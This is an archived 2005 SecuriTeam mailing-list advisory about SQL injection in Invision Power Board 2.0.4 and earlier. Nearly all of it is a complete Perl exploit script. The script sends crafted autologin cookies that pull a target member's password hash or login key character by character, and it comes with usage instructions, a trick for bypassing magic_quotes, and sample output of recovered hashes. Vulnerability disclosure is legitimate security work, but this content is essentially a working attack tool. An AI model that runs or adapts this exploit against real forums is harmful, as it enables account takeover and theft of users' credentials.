[EXPL] Invision Power Board SQL Injection Vulnerability (member_id, Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/19/05

  • Next message: SecuriTeam: "[UNIX] picasm Error Handling Stack Overflow"
    To: list@securiteam.com
    Date: 19 May 2005 17:06:10 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Invision Power Board SQL Injection Vulnerability (member_id, Exploit)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.invisionboard.com/> Invision Power Board (IPB) is "a
    professional forum system that has been built from the ground up with
    speed and security in mind, taking advantage of object oriented code,
    highly-optimized SQL queries, and the fast PHP engine. A comprehensive
    administration control panel is included to help you keep your board
    running smoothly. Moderators will also enjoy the full range of options
    available to them via built-in tools and moderators control panel. Members
    will appreciate the ability to subscribe to topics, send private messages,
    and perform a host of other options through the user control panel. It is
    used by millions of people over the world".

    An SQL injection vulnerability was found in Invision Power Board allows
    attackers to add, change, delete and view records from the database.

    DETAILS

    Vulnerable Systems:
     * Invision Power Board 2.0.4 and prior

    Exploit:
    #!/usr/bin/perl

    ## Invision Power Board SQL injection exploit by RST/GHC
    ## vulnerable forum versions : 1.* , 2.* (<2.0.4)
    ## tested on version 1.3 Final and version 2.0.2
    ## * work on all mysql versions
    ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc =
    On)
    ## (c)oded by 1dt.w0lf
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## screen:
    ## ~~~~
    ## r57ipb2.pl blah.com /ipb13/ 1 0
    ## [~] SERVER : blah.com
    ## [~] PATH : /ipb13/
    ## [~] MEMBER ID : 1
    ## [~] TARGET : 0 - IPB 1.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
    ##
    ## r57ipb2.pl blah.com /ipb202/ 1 1
    ## [~] SERVER : blah.com
    ## [~] PATH : /ipb202/
    ## [~] MEMBER ID : 1
    ## [~] TARGET : 1 - IPB 2.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Greets: James Bercegay of the GulfTech Security Research Team
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    use IO::Socket;

    if (@ARGV < 4) { &usage; }

    $server = $ARGV[0];
    $path = $ARGV[1];
    $member_id = $ARGV[2];
    $target = $ARGV[3];

    $pass = ($target)?('member_login_key'):('password');

    $server =~ s!(http:\/\/)!!;

    $request = 'http://';
    $request .= $server;
    $request .= $path;

    $s_num = 1;
    $|++;
    $n = 0;

    print "[~] SERVER : $server\r\n";
    print "[~] PATH : $path\r\n";
    print "[~] MEMBER ID : $member_id\r\n";
    print "[~] TARGET : $target";
    print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
    print "\r\n";
    print "[~] SEARCHING PASSWORD ... [|]";

    ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

    while(1)
    {
    if(&found(47,58)==0) { &found(96,122); }
    $char = $i;
    if ($char=="0")
     {
     if(length($allchar) > 0){
     print qq{\b\b DONE ]
     
     MEMBER ID : $member_id
     };
     print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
     print $allchar."\r\n";
     }
     else
     {
     print "\b\b FAILED ]";
     }
     exit();
     }
    else
     {
      $allchar .= chr(42);
     }
    $s_num++;
    }

    sub found($$)
     {
     my $fmin = $_[0];
     my $fmax = $_[1];
     if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
     
     $r = int($fmax - ($fmax-$fmin)/2);
     $check = " BETWEEN $r AND $fmax";
     if ( &check($check) ) { &found($r,$fmax); }
     else { &found($fmin,$r); }
     }
     
    sub crack($$)
     {
     my $cmin = $_[0];
     my $cmax = $_[1];
     $i = $cmin;
     while ($i<$cmax)
      {
      $crcheck = "=$i";
      if ( &check($crcheck) ) { return $i; }
      $i++;
      }
     $i = 0;
     return $i;
     }
     
    sub check($)
     {
     $n++;
     status();
     $ccheck = $_[0];
     $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
     $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75" .
    "%62%73%74%72%69%6E%67%28";
     $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
     $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
     $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0" .
    "%E0%F1%21%20";
     $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
    PeerPort => "80");

     printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost:
    %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection:
    close\n\n",
     $path, $server, $cmember_id, $pass_hash1, $cmember_id, $pass_hash2,
    $pass_hash3, $nmalykh);
     
     while(<$socket>)
      {
      if (/Set-Cookie: session_id=0;/) { return 1; }
      }

     return 0;
     }
     
    sub status()
    {
      $status = $n % 5;
      if($status==0){ print "\b\b/]"; }
      if($status==1){ print "\b\b-]"; }
      if($status==2){ print "\b\b\\]"; }
      if($status==3){ print "\b\b|]"; }
    }

    sub usage()
     {
     print q(
     Invision Power Board v < 2.0.4 SQL injection exploit
     ----------------------------------------------------
     USAGE:
     ~~~
     r57ipb2.pl [server] [/folder/] [member_id] [target]
     
     [server] - host where IPB installed
     [/folder/] - folder where IPB installed
     [member_id] - user id for brute
     
     targets:
              0 - IPB 1.*
              1 - IPB 2.* (Prior To 2.0.4)
     
     e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
     ----------------------------------------------------
     (c)oded by 1dt.w0lf
     RST/GHC , http://rst.void.ru , http://ghc.ru
     );
     exit();
     }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:roman@rs-labs.com> RusH.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] picasm Error Handling Stack Overflow"

    Relevant Pages

    • Re: Generic Password
      ... >> User-Level Security. ... >>> Dim stDocName As String ... >>> Exit Sub ... >>> Employee clicks on Login.htm and selects thier ...
      (microsoft.public.access.formscoding)
    • Re: Sheet passwording
      ... > Private Sub Worksheet_Activate ... > to change the macro security settings to get the macro to run. ... > You will also need to password protect your VBA project so no one can see ...
      (microsoft.public.excel.misc)
    • Re: Sheet passwording
      ... >> Private Sub Worksheet_Activate ... >> to change the macro security settings to get the macro to run. ... >> You will also need to password protect your VBA project so no one can ...
      (microsoft.public.excel.misc)
    • RE: Error 2501
      ... If she is getting those messages, Macro Security is set too high. ... Private Sub lstReports_DblClick ... a specific user running access ...
      (microsoft.public.access.modulesdaovba)
    • RE: VB.net WMI Win32_NtlogEvent problem, please help
      ... The access deinied is driven by trying to access the "security" logfile. ... > Set objLatestEvent = colMonitoredEvents.NextEvent ... > where a new log written into the logfiles. ... > End Sub ...
      (microsoft.public.dotnet.general)